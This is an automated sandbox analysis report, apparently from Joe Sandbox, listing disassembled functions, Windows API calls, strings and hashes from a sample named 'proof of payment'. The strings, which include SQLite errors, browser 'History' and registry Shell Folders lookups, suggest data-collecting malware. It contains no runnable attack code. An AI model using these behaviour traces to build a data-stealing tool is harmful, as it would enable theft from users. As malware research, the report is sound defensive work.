                                      Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy$memsetstrlen
                                      • String ID:
                                      • API String ID: 2350177629-0
                                      • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                      • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                      • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                      • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                      • API String ID: 2221118986-1606337402
                                      • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                      • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                      • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                      • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                        • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                        • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                      • memset.MSVCRT ref: 0040C439
                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                      • _wcsupr.MSVCRT ref: 0040C481
                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                      • memset.MSVCRT ref: 0040C4D0
                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                      • String ID:
                                      • API String ID: 1973883786-0
                                      • Opcode ID: 82fa03ba5326a94bf532841c06629f00165d9272e62604655f27a07229e6f7ea
                                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                      • Opcode Fuzzy Hash: 82fa03ba5326a94bf532841c06629f00165d9272e62604655f27a07229e6f7ea
                                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 004116FF
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                      • API String ID: 2618321458-3614832568
                                      • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                      • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 004185FC
                                      • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@AttributesFilememset
                                      • String ID:
                                      • API String ID: 776155459-0
                                      • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                      • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                      • malloc.MSVCRT ref: 00417524
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                      • String ID:
                                      • API String ID: 2308052813-0
                                      • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                      • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: PathTemp$??3@
                                      • String ID: %s\etilqs_$etilqs_
                                      • API String ID: 1589464350-1420421710
                                      • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                      • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0040FDD5
                                        • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                      • _snwprintf.MSVCRT ref: 0040FE1F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                      • String ID: <%s>%s</%s>$</item>$<item>
                                      • API String ID: 1775345501-2769808009
                                      • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                      • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                      • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                      • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wcscpy.MSVCRT ref: 0041477F
                                      • wcscpy.MSVCRT ref: 0041479A
                                      • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                      • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: wcscpy$CloseCreateFileHandle
                                      • String ID: General
                                      • API String ID: 999786162-26480598
                                      • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                      • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                      • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                      • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ErrorLastMessage_snwprintf
                                      • String ID: Error$Error %d: %s
                                      • API String ID: 313946961-1552265934
                                      • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                      • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: foreign key constraint failed$new$oid$old
                                      • API String ID: 0-1953309616
                                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                      • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                      • API String ID: 3510742995-272990098
                                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                      • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: gj
                                      • API String ID: 1297977491-4203073231
                                      • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                      • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                        • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                      • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                      • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                      • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                      Download Yara Rule
                                      APIs
                                      • AreFileApisANSI.KERNEL32 ref: 00417497
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                      • malloc.MSVCRT ref: 004174BD
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                      • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                      • String ID:
                                      • API String ID: 2903831945-0
                                      • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                      • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(?), ref: 0040D453
                                      • GetWindowRect.USER32(?,?), ref: 0040D460
                                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Window$Rect$ClientParentPoints
                                      • String ID:
                                      • API String ID: 4247780290-0
                                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                      • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                      • memset.MSVCRT ref: 004450CD
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                      • String ID:
                                      • API String ID: 1471605966-0
                                      • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                      • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                      • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                      • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                      Download Yara Rule
                                      APIs
                                      • wcscpy.MSVCRT ref: 0044475F
                                      • wcscat.MSVCRT ref: 0044476E
                                      • wcscat.MSVCRT ref: 0044477F
                                      • wcscat.MSVCRT ref: 0044478E
                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                      • String ID: \StringFileInfo\
                                      • API String ID: 102104167-2245444037
                                      • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                      • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                      • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                      • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                      • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                      • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                      • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040F508 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy$??3@
                                      • String ID: g4@
                                      • API String ID: 3314356048-2133833424
                                      • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                      • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                      • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                      • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _memicmpwcslen
                                      • String ID: @@@@$History
                                      • API String ID: 1872909662-685208920
                                      • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                      • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                      • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                      • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 004100FB
                                      • memset.MSVCRT ref: 00410112
